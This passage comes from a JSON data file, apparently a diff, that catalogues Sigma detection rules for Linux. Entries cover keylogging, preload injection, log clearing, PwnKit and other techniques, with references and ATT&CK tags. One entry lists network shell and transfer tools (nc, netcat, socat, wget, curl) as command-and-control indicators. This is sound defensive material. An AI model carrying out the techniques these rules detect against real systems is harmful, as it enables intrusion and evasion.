"https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1056.001/T1056.001.md", - "https://attack.mitre.org/techniques/T1003/", - "https://linux.die.net/man/8/pam_tty_audit", - "https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/security_guide/sec-configuring_pam_for_auditing", - "https://access.redhat.com/articles/4409591#audit-record-types-2", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_keylogging_with_pam_d.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1003", - "attack.t1056.001" - ], - "creation_date": "2021/05/24", - "filename": "lnx_auditd_keylogging_with_pam_d.yml", - "author": "Pawel Mazur", - "level": "high", - "falsepositive": [ - "Administrative work" - ], - "logsource.category": "No established category", - "logsource.product": "linux" - } - }, - { - "description": "Identifies modification of ld.so.preload for shared object injection. This technique is used by attackers to load arbitrary code into processes.", - "uuid": "4b3cb710-5e83-4715-8c45-8b2b5b3e5751", - "value": "Modification of ld.so.preload", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1574.006/T1574.006.md", - "https://eqllib.readthedocs.io/en/latest/analytics/fd9b987a-1101-4ed3-bda6-a70300eaf57e.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_ld_so_preload_mod.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1574.006" - ], - "creation_date": "2019/10/24", - "filename": "lnx_auditd_ld_so_preload_mod.yml", - "author": "E.M. Anhaus (originally from Atomic Blue Detections, Tony Lambert), oscd.community", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "linux" - } - }, - { - "description": "Detects loading of kernel modules with insmod command.\nLoadable Kernel Modules (LKMs) are pieces of code that can be loaded and unloaded into the kernel upon demand.\nAdversaries may use LKMs to obtain persistence within the system or elevate the privileges.\n", - "uuid": "106d7cbd-80ff-4985-b682-a7043e5acb72", - "value": "Loading of Kernel Module via Insmod", - "meta": { - "refs": [ - "https://attack.mitre.org/techniques/T1547/006/", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.006/T1547.006.md", - "https://linux.die.net/man/8/insmod", - "https://man7.org/linux/man-pages/man8/kmod.8.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_load_module_insmod.yml" - ], - "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "attack.t1547.006" - ], - "creation_date": "2021/11/02", - "filename": "lnx_auditd_load_module_insmod.yml", - "author": "Pawel Mazur", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "linux" - } - }, - { - "description": "Detect changes of syslog daemons configuration files", - "uuid": "c830f15d-6f6e-430f-8074-6f73d6807841", - "value": "Logging Configuration Changes on Linux Host", - "meta": { - "refs": [ - "self experience", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_logging_config_change.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562.006" - ], - "creation_date": "2019/10/25", - "filename": "lnx_auditd_logging_config_change.yml", - "author": "Mikhail Larin, oscd.community", - "level": "high", - "falsepositive": [ - "Legitimate administrative activity" - ], - "logsource.category": "No established category", - "logsource.product": "linux" - } - }, - { - "description": "Masquerading occurs when the name or location of an executable, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation.\nSeveral different variations of this technique have been observed.\n", - "uuid": "9d4548fa-bba0-4e88-bd66-5d5bf516cda0", - "value": "Masquerading as Linux Crond Process", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/8a82e9b66a5b4f4bc5b91089e9f24e0544f20ad7/atomics/T1036.003/T1036.003.md#atomic-test-2---masquerading-as-linux-crond-process", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_masquerading_crond.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1036.003" - ], - "creation_date": "2019/10/21", - "filename": "lnx_auditd_masquerading_crond.yml", - "author": "Timur Zinniatullin, oscd.community", - "level": "medium", - "falsepositive": "No established falsepositives", - "logsource.category": "No established category", - "logsource.product": "linux" - } - }, - { - "description": "Detects enumeration of local or remote network services.", - "uuid": "3761e026-f259-44e6-8826-719ed8079408", - "value": "Linux Network Service Scanning - Auditd", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1046/T1046.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_network_service_scanning.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1046" - ], - "creation_date": "2020/10/21", - "filename": "lnx_auditd_network_service_scanning.yml", - "author": "Alejandro Ortuno, oscd.community", - "level": "low", - "falsepositive": [ - "Legitimate administration activities" - ], - "logsource.category": "No established category", - "logsource.product": "linux" - } - }, - { - "description": "Network sniffing refers to using the network interface on a system to monitor or capture information sent over a wired or wireless connection.\nAn adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data.\n", - "uuid": "f4d3748a-65d1-4806-bd23-e25728081d01", - "value": "Network Sniffing - Linux", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1040/T1040.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_network_sniffing.yml" - ], - "tags": [ - "attack.credential_access", - "attack.discovery", - "attack.t1040" - ], - "creation_date": "2019/10/21", - "filename": "lnx_auditd_network_sniffing.yml", - "author": "Timur Zinniatullin, oscd.community", - "level": "low", - "falsepositive": [ - "Legitimate administrator or user uses network sniffing tool for legitimate reasons." - ], - "logsource.category": "No established category", - "logsource.product": "linux" - } - }, - { - "description": "Rule to detect the use of the SCX RunAsProvider Invoke_ExecuteShellCommand to execute any UNIX/Linux command using the /bin/sh shell.\nSCXcore, started as the Microsoft Operations Manager UNIX/Linux Agent, is now used in a host of products including Microsoft Operations Manager.\nMicrosoft Azure, and Microsoft Operations Management Suite.\n", - "uuid": "045b5f9c-49f7-4419-a236-9854fb3c827a", - "value": "OMIGOD SCX RunAsProvider ExecuteShellCommand - Auditd", - "meta": { - "refs": [ - "https://www.wiz.io/blog/omigod-critical-vulnerabilities-in-omi-azure", - "https://github.com/Azure/Azure-Sentinel/pull/3059", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_omigod_scx_runasprovider_executeshellcommand.yml" - ], - "tags": [ - "attack.privilege_escalation", - "attack.initial_access", - "attack.execution", - "attack.t1068", - "attack.t1190", - "attack.t1203" - ], - "creation_date": "2021/09/17", - "filename": "lnx_auditd_omigod_scx_runasprovider_executeshellcommand.yml", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", - "level": "high", - "falsepositive": [ - "Legitimate use of SCX RunAsProvider Invoke_ExecuteShellCommand." - ], - "logsource.category": "No established category", - "logsource.product": "linux" - } - }, - { - "description": "Detects password policy discovery commands", - "uuid": "ca94a6db-8106-4737-9ed2-3e3bb826af0a", - "value": "Password Policy Discovery", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1201/T1201.md", - "https://attack.mitre.org/techniques/T1201/", - "https://linux.die.net/man/1/chage", - "https://man7.org/linux/man-pages/man1/passwd.1.html", - "https://superuser.com/questions/150675/how-to-display-password-policy-information-for-a-user-ubuntu", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_password_policy_discovery.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1201" - ], - "creation_date": "2020/10/08", - "filename": "lnx_auditd_password_policy_discovery.yml", - "author": "\u00d6mer G\u00fcnal, oscd.community, Pawel Mazur", - "level": "low", - "falsepositive": [ - "Legitimate administration activities" - ], - "logsource.category": "No established category", - "logsource.product": "linux" - } - }, - { - "description": "Detects a reload or a start of a service.", - "uuid": "2625cc59-0634-40d0-821e-cb67382a3dd7", - "value": "Systemd Service Reload or Start", - "meta": { - "refs": [ - "https://attack.mitre.org/techniques/T1543/002/", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1543.002/T1543.002.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_pers_systemd_reload.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1543.002" - ], - "creation_date": "2019/09/23", - "filename": "lnx_auditd_pers_systemd_reload.yml", - "author": "Jakob Weinzettl, oscd.community", - "level": "low", - "falsepositive": [ - "Installation of legitimate service.", - "Legitimate reconfiguration of service." - ], - "logsource.category": "No established category", - "logsource.product": "linux" - } - }, - { - "description": "Detects adversary creating screen capture of a desktop with Import Tool.\nHighly recommended using rule on servers, due to high usage of screenshot utilities on user workstations.\nImageMagick must be installed.\n", - "uuid": "dbe4b9c5-c254-4258-9688-d6af0b7967fd", - "value": "Screen Capture with Import Tool", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1113/T1113.md", - "https://attack.mitre.org/techniques/T1113/", - "https://linux.die.net/man/1/import", - "https://imagemagick.org/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_screencapture_import.yml" - ], - "tags": [ - "attack.collection", - "attack.t1113" - ], - "creation_date": "2021/09/21", - "filename": "lnx_auditd_screencapture_import.yml", - "author": "Pawel Mazur", - "level": "low", - "falsepositive": [ - "Legitimate use of screenshot utility" - ], - "logsource.category": "No established category", - "logsource.product": "linux" - } - }, - { - "description": "Detects adversary creating screen capture of a full with xwd. Highly recommended using rule on servers, due high usage of screenshot utilities on user workstations", - "uuid": "e2f17c5d-b02a-442b-9052-6eb89c9fec9c", - "value": "Screen Capture with Xwd", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1113/T1113.md#atomic-test-3---x-windows-capture", - "https://attack.mitre.org/techniques/T1113/", - "https://linux.die.net/man/1/xwd", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_screencaputre_xwd.yml" - ], - "tags": [ - "attack.collection", - "attack.t1113" - ], - "creation_date": "2021/09/13", - "filename": "lnx_auditd_screencaputre_xwd.yml", - "author": "Pawel Mazur", - "level": "low", - "falsepositive": [ - "Legitimate use of screenshot utility" - ], - "logsource.category": "No established category", - "logsource.product": "linux" - } - }, - { - "description": "Detection use of the command \"split\" to split files into parts and possible transfer.", - "uuid": "2dad0cba-c62a-4a4f-949f-5f6ecd619769", - "value": "Split A File Into Pieces - Linux", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1030/T1030.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_split_file_into_pieces.yml" - ], - "tags": [ - "attack.exfiltration", - "attack.t1030" - ], - "creation_date": "2020/10/15", - "filename": "lnx_auditd_split_file_into_pieces.yml", - "author": "Igor Fits, oscd.community", - "level": "low", - "falsepositive": [ - "Legitimate administrative activity" - ], - "logsource.category": "No established category", - "logsource.product": "linux" - } - }, - { - "description": "Detects embeding of files with usage of steghide binary, the adversaries may use this technique to prevent the detection of hidden information.", - "uuid": "ce446a9e-30b9-4483-8e38-d2c9ad0a2280", - "value": "Steganography Hide Files with Steghide", - "meta": { - "refs": [ - "https://attack.mitre.org/techniques/T1027/003/", - "https://vitux.com/how-to-hide-confidential-files-in-images-on-debian-using-steganography/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_steghide_embed_steganography.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1027.003" - ], - "creation_date": "2021/09/11", - "filename": "lnx_auditd_steghide_embed_steganography.yml", - "author": "Pawel Mazur", - "level": "low", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "linux" - } - }, - { - "description": "Detects extraction of files with usage of steghide binary, the adversaries may use this technique to prevent the detection of hidden information.", - "uuid": "a5a827d9-1bbe-4952-9293-c59d897eb41b", - "value": "Steganography Extract Files with Steghide", - "meta": { - "refs": [ - "https://attack.mitre.org/techniques/T1027/003/", - "https://vitux.com/how-to-hide-confidential-files-in-images-on-debian-using-steganography/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_steghide_extract_steganography.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1027.003" - ], - "creation_date": "2021/09/11", - "filename": "lnx_auditd_steghide_extract_steganography.yml", - "author": "Pawel Mazur", - "level": "low", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "linux" - } - }, - { - "description": "Detects suspicious activities as declared by Florian Roth in its 'Best Practice Auditd Configuration'.\nThis includes the detection of the following commands; wget, curl, base64, nc, netcat, ncat, ssh, socat, wireshark, rawshark, rdesktop, nmap.\nThese commands match a few techniques from the tactics \"Command and Control\", including not exhaustively the following; Application Layer Protocol (T1071), Non-Application Layer Protocol (T1095), Data Encoding (T1132)\n", - "uuid": "f7158a64-6204-4d6d-868a-6e6378b467e0", - "value": "Suspicious C2 Activities", - "meta": { - "refs": [ - "https://github.com/Neo23x0/auditd", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_susp_c2_commands.yml" - ], - "tags": [ - "attack.command_and_control" - ], - "creation_date": "2020/05/18", - "filename": "lnx_auditd_susp_c2_commands.yml", - "author": "Marie Euler", - "level": "medium", - "falsepositive": [ - "Admin or User activity" - ], - "logsource.category": "No established category", - "logsource.product": "linux" - } - }, - { - "description": "Detects relevant commands often related to malware or hacking activity", - "uuid": "1543ae20-cbdf-4ec1-8d12-7664d667a825", - "value": "Suspicious Commands Linux", - "meta": { - "refs": [ - "Internal Research - mostly derived from exploit code including code in MSF", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_susp_cmds.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.004" - ], - "creation_date": "2017/12/12", - "filename": "lnx_auditd_susp_cmds.yml", - "author": "Florian Roth", - "level": "medium", - "falsepositive": [ - "Admin activity" - ], - "logsource.category": "No established category", - "logsource.product": "linux" - } - }, - { - "description": "Detects program executions in suspicious non-program folders related to malware or hacking activity", - "uuid": "a39d7fa7-3fbd-4dc2-97e1-d87f546b1bbc", - "value": "Program Executions in Suspicious Folders", - "meta": { - "refs": [ - "Internal Research", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_susp_exe_folders.yml" - ], - "tags": [ - "attack.t1587", - "attack.t1584", - "attack.resource_development" - ], - "creation_date": "2018/01/23", - "filename": "lnx_auditd_susp_exe_folders.yml", - "author": "Florian Roth", - "level": "medium", - "falsepositive": [ - "Admin activity (especially in /tmp folders)", - "Crazy web applications" - ], - "logsource.category": "No established category", - "logsource.product": "linux" - } - }, - { - "description": "Detects commandline operations on shell history files", - "uuid": "eae8ce9f-bde9-47a6-8e79-f20d18419910", - "value": "Suspicious History File Operations - Linux", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.003/T1552.003.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_susp_histfile_operations.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1552.003" - ], - "creation_date": "2020/10/17", - "filename": "lnx_auditd_susp_histfile_operations.yml", - "author": "Mikhail Larin, oscd.community", - "level": "medium", - "falsepositive": [ - "Legitimate administrative activity", - "Legitimate software, cleaning hist file" - ], - "logsource.category": "No established category", - "logsource.product": "linux" - } - }, - { - "description": "Detects a creation of systemd services which could be used by adversaries to execute malicious code.", - "uuid": "1bac86ba-41aa-4f62-9d6b-405eac99b485", - "value": "Systemd Service Creation", - "meta": { - "refs": [ - "https://attack.mitre.org/techniques/T1543/002/", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1543.002/T1543.002.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_systemd_service_creation.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1543.002" - ], - "creation_date": "2022/02/03", - "filename": "lnx_auditd_systemd_service_creation.yml", - "author": "Pawel Mazur", - "level": "medium", - "falsepositive": [ - "Admin work like legit service installs." - ], - "logsource.category": "No established category", - "logsource.product": "linux" - } - }, - { - "description": "Detects System Information Discovery commands", - "uuid": "f34047d9-20d3-4e8b-8672-0a35cc50dc71", - "value": "System Information Discovery - Auditd", - "meta": { - "refs": [ - "https://attack.mitre.org/techniques/T1082/", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1082/T1082.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_system_info_discovery.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1082" - ], - "creation_date": "2021/09/03", - "filename": "lnx_auditd_system_info_discovery.yml", - "author": "Pawel Mazur", - "level": "low", - "falsepositive": [ - "Legitimate administrative activity" - ], - "logsource.category": "No established category", - "logsource.product": "linux" - } - }, - { - "description": "Detects system information discovery commands", - "uuid": "1f358e2e-cb63-43c3-b575-dfb072a6814f", - "value": "System and Hardware Information Discovery", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1082/T1082.md#atomic-test-4---linux-vm-check-via-hardware", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_system_info_discovery2.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1082" - ], - "creation_date": "2020/10/08", - "filename": "lnx_auditd_system_info_discovery2.yml", - "author": "\u00d6mer G\u00fcnal, oscd.community", - "level": "informational", - "falsepositive": [ - "Legitimate administration activities" - ], - "logsource.category": "No established category", - "logsource.product": "linux" - } - }, - { - "description": "Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems.", - "uuid": "4cb57c2f-1f29-41f8-893d-8bed8e1c1d2f", - "value": "System Shutdown/Reboot - Linux", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1529/T1529.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_system_shutdown_reboot.yml" - ], - "tags": [ - "attack.impact", - "attack.t1529" - ], - "creation_date": "2020/10/15", - "filename": "lnx_auditd_system_shutdown_reboot.yml", - "author": "Igor Fits, oscd.community", - "level": "informational", - "falsepositive": [ - "Legitimate administrative activity" - ], - "logsource.category": "No established category", - "logsource.product": "linux" - } - }, - { - "description": "Detects extracting of zip file from image file", - "uuid": "edd595d7-7895-4fa7-acb3-85a18a8772ca", - "value": "Steganography Unzip Hidden Information From Picture File", - "meta": { - "refs": [ - "https://attack.mitre.org/techniques/T1027/003/", - "https://zerotoroot.me/steganography-hiding-a-zip-in-a-jpeg-file/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_unzip_hidden_zip_files_steganography.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1027.003" - ], - "creation_date": "2021/09/09", - "filename": "lnx_auditd_unzip_hidden_zip_files_steganography.yml", - "author": "Pawel Mazur", - "level": "low", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "linux" - } - }, - { - "description": "Adversaries may use the information from System Owner/User Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.", - "uuid": "9a0d8ca0-2385-4020-b6c6-cb6153ca56f3", - "value": "System Owner or User Discovery", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1033/T1033.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_user_discovery.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1033" - ], - "creation_date": "2019/10/21", - "filename": "lnx_auditd_user_discovery.yml", - "author": "Timur Zinniatullin, oscd.community", - "level": "low", - "falsepositive": [ - "Admin activity" - ], - "logsource.category": "No established category", - "logsource.product": "linux" - } - }, - { - "description": "Detects possible command execution by web application/web shell", - "uuid": "c0d3734d-330f-4a03-aae2-65dacc6a8222", - "value": "Webshell Remote Command Execution", - "meta": { - "refs": [ - "Personal Experience of the Author", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_web_rce.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1505.003" - ], - "creation_date": "2019/10/12", - "filename": "lnx_auditd_web_rce.yml", - "author": "Ilyas Ochkov, Beyu Denis, oscd.community", - "level": "critical", - "falsepositive": [ - "Admin activity", - "Crazy web applications" - ], - "logsource.category": "No established category", - "logsource.product": "linux" - } - }, - { - "description": "Detects suspicious shell commands used in various Equation Group scripts and tools", - "uuid": "41e5c73d-9983-4b69-bd03-e13b67e9623c", - "value": "Equation Group Indicators", - "meta": { - "refs": [ - "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/lnx_apt_equationgroup_lnx.yml" - ], - "tags": [ - "attack.execution", - "attack.g0020", - "attack.t1059.004" - ], - "creation_date": "2017/04/09", - "filename": "lnx_apt_equationgroup_lnx.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "linux" - } - }, - { - "description": "Detects buffer overflow attempts in Unix system log files", - "uuid": "18b042f0-2ecd-4b6e-9f8d-aa7a7e7de781", - "value": "Buffer Overflow Attempts", - "meta": { - "refs": [ - "https://github.com/ossec/ossec-hids/blob/1ecffb1b884607cb12e619f9ab3c04f530801083/etc/rules/attack_rules.xml", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/lnx_buffer_overflows.yml" - ], - "tags": [ - "attack.t1068", - "attack.privilege_escalation" - ], - "creation_date": "2017/03/01", - "filename": "lnx_buffer_overflows.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "linux" - } - }, - { - "description": "Detects specific commands commonly used to remove or empty the syslog", - "uuid": "e09eb557-96d2-4de9-ba2d-30f712a5afd3", - "value": "Commands to Clear or Remove the Syslog - Builtin", - "meta": { - "refs": [ - "https://www.virustotal.com/gui/file/fc614fb4bda24ae8ca2c44e812d12c0fab6dd7a097472a35dd12ded053ab8474", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/lnx_clear_syslog.yml" - ], - "tags": [ - "attack.impact", - "attack.t1565.001" - ], - "creation_date": "2021/09/10", - "filename": "lnx_clear_syslog.yml", - "author": "Max Altgelt", - "level": "high", - "falsepositive": [ - "Log rotation" - ], - "logsource.category": "No established category", - "logsource.product": "linux" - } - }, - { - "description": "Detects suspicious modification of crontab file.", - "uuid": "af202fd3-7bff-4212-a25a-fb34606cfcbe", - "value": "Modifying Crontab", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1053.003/T1053.003.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/lnx_crontab_file_modification.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1053.003" - ], - "creation_date": "2022/04/16", - "filename": "lnx_crontab_file_modification.yml", - "author": "Pawel Mazur", - "level": "medium", - "falsepositive": [ - "Legitimate modification of crontab" - ], - "logsource.category": "No established category", - "logsource.product": "linux" - } - }, - { - "description": "Detects the use of tools that copy files from or to remote systems", - "uuid": "7a14080d-a048-4de8-ae58-604ce58a795b", - "value": "Remote File Copy", - "meta": { - "refs": [ - "https://attack.mitre.org/techniques/T1105/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/lnx_file_copy.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.lateral_movement", - "attack.t1105" - ], - "creation_date": "2020/06/18", - "filename": "lnx_file_copy.yml", - "author": "\u00d6mer G\u00fcnal", - "level": "low", - "falsepositive": [ - "Legitimate administration activities" - ], - "logsource.category": "No established category", - "logsource.product": "linux" - } - }, - { - "description": "Detects the ld.so preload persistence file. See `man ld.so` for more information.", - "uuid": "7e3c4651-c347-40c4-b1d4-d48590fdf684", - "value": "Code Injection by ld.so Preload", - "meta": { - "refs": [ - "https://man7.org/linux/man-pages/man8/ld.so.8.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/lnx_ldso_preload_injection.yml" - ], - "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "attack.t1574.006" - ], - "creation_date": "2021/05/05", - "filename": "lnx_ldso_preload_injection.yml", - "author": "Christian Burkard", - "level": "high", - "falsepositive": [ - "Rare temporary workaround for library misconfiguration" - ], - "logsource.category": "No established category", - "logsource.product": "linux" - } - }, - { - "description": "Detects exploitation of Nimbuspwn privilege escalation vulnerability (CVE-2022-29799 and CVE-2022-29800)", - "uuid": "7ba05b43-adad-4c02-b5e9-c8c35cdf9fa8", - "value": "Nimbuspwn Exploitation", - "meta": { - "refs": [ - "https://www.microsoft.com/security/blog/2022/04/26/microsoft-finds-new-elevation-of-privilege-linux-vulnerability-nimbuspwn/", - "https://github.com/Immersive-Labs-Sec/nimbuspwn", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/lnx_nimbuspwn_privilege_escalation_exploit.yml" - ], - "tags": [ - "attack.privilege_escalation", - "attack.t1068" - ], - "creation_date": "2022/05/04", - "filename": "lnx_nimbuspwn_privilege_escalation_exploit.yml", - "author": "Bhabesh Raj", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "linux" - } - }, - { - "description": "Detects potential PwnKit exploitation CVE-2021-4034 in auth logs", - "uuid": "0506a799-698b-43b4-85a1-ac4c84c720e9", - "value": "PwnKit Local Privilege Escalation", - "meta": { - "refs": [ - "https://twitter.com/wdormann/status/1486161836961579020", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/lnx_pwnkit_local_privilege_escalation.yml" - ], - "tags": [ - "attack.privilege_escalation", - "attack.t1548.001" - ], - "creation_date": "2022/01/26", - "filename": "lnx_pwnkit_local_privilege_escalation.yml", - "author": "Sreeman", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "linux" - } - }, - { - "description": "Detects shellshock expressions in log files", - "uuid": "c67e0c98-4d39-46ee-8f6b-437ebf6b950e", - "value": "Shellshock Expression", - "meta": { - "refs": [ - "https://owasp.org/www-pdf-archive/Shellshock_-_Tudor_Enache.pdf", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/lnx_shellshock.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1505.003" - ], - "creation_date": "2017/03/14", - "filename": "lnx_shellshock.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "linux" - } - }, - { - "description": "Clear command history in linux which is used for defense evasion.", - "uuid": "fdc88d25-96fb-4b7c-9633-c0e417fdbd4e", - "value": "Clear Command History", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.003/T1070.003.md", - "https://attack.mitre.org/techniques/T1070/003/", - "https://www.hackers-arise.com/single-post/2016/06/20/Covering-your-BASH-Shell-Tracks-AntiForensics", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/lnx_shell_clear_cmd_history.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1070.003" - ], - "creation_date": "2019/03/24", - "filename": "lnx_shell_clear_cmd_history.yml", - "author": "Patrick Bareiss", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "linux" - } - }, - { - "description": "Detects suspicious shell commands indicating the information gathering phase as preparation for the Privilege Escalation.", - "uuid": "444ade84-c362-4260-b1f3-e45e20e1a905", - "value": "Privilege Escalation Preparation", - "meta": { - "refs": [ - "https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/", - "https://patrick-bareiss.com/detect-privilege-escalation-preparation-in-linux-with-sigma/", - "https://github.com/uber-common/metta/blob/master/MITRE/Privilege_Escalation/privesc_linux_filesystemweakness.yml", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/lnx_shell_priv_esc_prep.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.004" - ], - "creation_date": "2019/04/05", - "filename": "lnx_shell_priv_esc_prep.yml", - "author": "Patrick Bareiss", - "level": "medium", - "falsepositive": [ - "Troubleshooting on Linux Machines" - ], - "logsource.category": "No established category", - "logsource.product": "linux" - } - }, - { - "description": "Detects suspicious shell commands used in various exploit codes (see references)", - "uuid": "2aa1440c-9ae9-4d92-84a7-a9e5f5e31695", - "value": "Suspicious Activity in Shell Commands", - "meta": { - "refs": [ - "http://www.threatgeek.com/2017/03/widespread-exploitation-attempts-using-cve-2017-5638.html", - 